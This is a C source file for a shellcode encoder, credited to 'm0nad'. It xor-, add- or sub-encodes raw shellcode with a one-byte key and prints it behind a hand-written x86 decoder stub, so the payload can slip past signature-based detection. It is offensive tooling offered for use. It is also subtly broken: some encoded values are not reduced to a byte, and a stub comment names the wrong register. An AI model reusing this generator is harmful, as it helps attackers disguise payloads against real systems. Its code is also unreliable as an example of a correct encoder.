/*
 * "Polymorphic" shellcode generator - m0nad
 *
 * Prints, as one C string literal, a small decoder stub followed by the
 * input bytes after they were run through add/sub/xor with a one-byte key.
 * Only three bytes of the stub change between runs (the size byte, the
 * inverse-operation byte and the key); everything else in the stub is a
 * constant byte sequence, which is why "Polymorphic" is in quotes.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int calc(int, int, int);
void usage();
int decode_op(int);

/*
 * Operation selector.  Each value is also the byte printed right after
 * 0x83 in the decoder stub (through decode_op), so the numeric values are
 * not arbitrary and must not be renumbered.
 */
enum OP {
    SUB = 0x2c,
    ADD = 0x04,
    XOR = 0x34
};

/*
 * Entry point.
 *
 * argv[1] names the operation (add, sub or xor), argv[2] is parsed with
 * atoi() as the key and argv[3] is the raw byte string whose strlen() is
 * used as the size.  Anything other than exactly three arguments, or an
 * operation name that is not in the table, prints the usage text and exits
 * with status 1.  On success the encoded literal is written to stdout and
 * 0 is returned.
 */
int main(int argc, char **argv)
{
    static const struct {
        const char *name;
        unsigned short code;
    } table[] = {
        { "add", ADD },
        { "sub", SUB },
        { "xor", XOR },
    };
    unsigned short op = 0;   /* no valid code is 0, so 0 means "not found" */

    if (argc != 4) {
        usage();             /* exits with status 1, never returns */
    }

    for (size_t k = 0; k < sizeof table / sizeof table[0]; k++) {
        if (strcmp(argv[1], table[k].name) == 0) {
            op = table[k].code;
            break;
        }
    }
    if (op == 0) {
        usage();             /* unknown operation name */
    }

    unsigned short key = atoi(argv[2]);   /* narrowed to 16 bits on assignment */
    unsigned int size = strlen(argv[3]);

    printf("shellcode %s 0x%.2x encoded:\n", argv[1], key);
    printf("\"");

    /*
     * Decoder stub.  The three %.2x slots receive, in order, the size byte,
     * the inverse operation byte from decode_op() and the key.
     */
    printf(
        //_start:
        "\\xeb\\x0d"                      // jmp encoded
        //decoder:
        "\\x5e"                           // pop %esi
        "\\x6a\\x%.2x"                    // push $size
        "\\x5f"                           // pop %edx
        //decoder_loop:
        "\\x83\\x%.2x\\x3e\\x%.2x"        // inst $key,(%esi,%edx,1)
        "\\x4f"                           // dec %edx
        "\\x75\\xf9"                      // jne decoder_loop
        "\\xeb\\x05"                      // jmp shellcode
        //encoded:
        "\\xe8\\xee\\xff\\xff\\xff",      // call decoder
        //shellcode:
        size, decode_op(op), key);

    /* Payload: each input byte, masked to 8 bits, transformed by calc(). */
    for (unsigned short i = 0; i < size; i++) {
        unsigned short byte = argv[3][i] & 0xff;
        printf("\\x%.2x", calc(op, byte, key));
    }
    puts("\"");
    return 0;
}

/*
 * Print the banner and usage text to stdout, then exit with status 1.
 * Never returns.
 */
void usage()
{
    fputs("Polymorphic shellcode generator - m0nad\n\n", stdout);
    fputs("Usage:\n\t./psg \n", stdout);
    fputs("Types:\n\txor\n\tadd\n\tsub\n", stdout);
    fputs("Ex:\n\t./psg xor 10 $(cat shellcode)\n", stdout);
    exit(1);
}
/*
 * Apply one encoding operation to a pair of integers.
 *
 * operation  one of the enum OP values (ADD, SUB, XOR)
 * op1, op2   operands; main() passes the masked input byte and the key
 *
 * Returns op1 + op2, op1 - op2 or op1 ^ op2 as a plain int, with no
 * reduction to a byte (main() prints the value with "%.2x").  Any other
 * operation value yields 0.
 */
int calc(int operation, int op1, int op2)
{
    int result = 0;          /* unknown operation: nothing is applied */

    if (operation == ADD) {
        result = op1 + op2;
    } else if (operation == SUB) {
        result = op1 - op2;
    } else if (operation == XOR) {
        result = op1 ^ op2;
    }
    return result;
}

/*
 * Map an encoding operation to the operation the decoder stub must apply
 * to undo it: ADD and SUB are each other's inverse, XOR is its own.
 * The returned value is the byte printed after 0x83 in the stub.
 *
 * Returns 0 for any value that is not one of the enum OP constants.
 */
int decode_op(int op)
{
    if (op == ADD) {
        return SUB;
    }
    if (op == SUB) {
        return ADD;
    }
    return op == XOR ? XOR : 0;
}